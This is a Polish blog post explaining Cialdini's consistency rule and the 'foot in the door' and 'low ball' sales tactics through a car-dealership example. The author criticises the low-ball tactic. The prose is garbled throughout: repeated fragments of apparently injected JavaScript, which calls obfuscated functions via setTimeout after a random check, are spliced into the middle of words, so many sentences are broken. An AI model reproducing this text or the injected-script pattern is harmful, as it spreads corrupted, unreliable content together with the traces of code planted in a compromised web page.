Reguła konsekwencji opiera się na tym, że ludzie mają tendencję do trzymania się raz obranego kierunku, podjętej decyzji czy przyjętej postawy. To tak jak z tymi krowami co nie zmieniają poglądów. No i ludzie tacy, (czytaj: klienci), idą jak te krowy na rzeź a raczej w „opiekuńcze ramiona” sprzedawców, marketingowców i speców od reklamy i PR.
Powinieneś wzbudzić u swojego klienta, słuchacza zaangażowanie w jakąś sprawę. Jeśli Twój klient rozpoczął np. tesdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towanie odkurzacza, czy też dał się namówić na jazdę próbna samochodem, jest duże prawdopodobieństwo, że będzie kontynuował działanie do końca czyli do zakupu, właśnie tak jak prowadzi go reguła konsekwencji – „skoro tyle czasu poświęcam na dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, muszę zatem doprowadzić sprawę do końca” – myśli.
Na regule konsekwencji oparte są dwie techniki sprzedażowe: „sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topa w drzwiach” oraz „niska piłka”. Nazwy zaczerpnąłem od Roberta Cialdiniego audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tora bestsellera “Wywieranie wpływu na ludzi”.
Reguła konsekwencji – “sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topa w drzwiach”
W tym przykładzie trzymajmy się salonu samochodowego, o którym już była mowa. Sprzedawca skłania klienta do zgody na małą prośbę. Niech dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to będzie obejrzenie auta (oczywiście niezobowiązujące). Klient mówi – Tak (po raz pierwszy). W ten sposób angażuje swój czas i energię w proces sprzedaży. Następnie dealer proponuje jazdę próbną. To kolejna prośba na drodze do celu, czyli sprzedaży. Kupujący mówi – Tak (po raz drugi). Skoro obejrzał, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to wardom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to się przejechać. Po powrocie z przejażdżki, sprzedawca zaprasza do biura i proponuje wybór opcji wyposażenia, formy płatności itp. Kupujący mówi – Tak (po raz trzeci). Działa zgodnie z zasadą konsekwencji! A czwarty raz powie “Tak” przy podpisywaniu umowy kupna wymarzonego a może raczej „wciśniętego” samochodu!
Reguła konsekwencji – “niska piłka”
Sprzedawca proponuje korzystną ofertę, na swój produkt, niższą od konkurencji. Robi dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to po dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to aby uzyskać przychylną decyzję o zakupie. Następnie (dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to naprawdę świństwo!) wycofuje ją, dosłownie w momencie sprzedaży, podpisywania umowy. Tłumaczy dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to błędem w obliczeniach albo pomyłką. I proszę sobie wyobrazić co się dzieje – kupujący tak są już zaangażowani w proces kupowania, że przystają na nowe, znacznie gorsze warunku zakupu! Tak silna jest w nas niechęć do zawrócenia z raz obranego kierunku działania…
![]() |
Wpis Ci się podobał?
Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!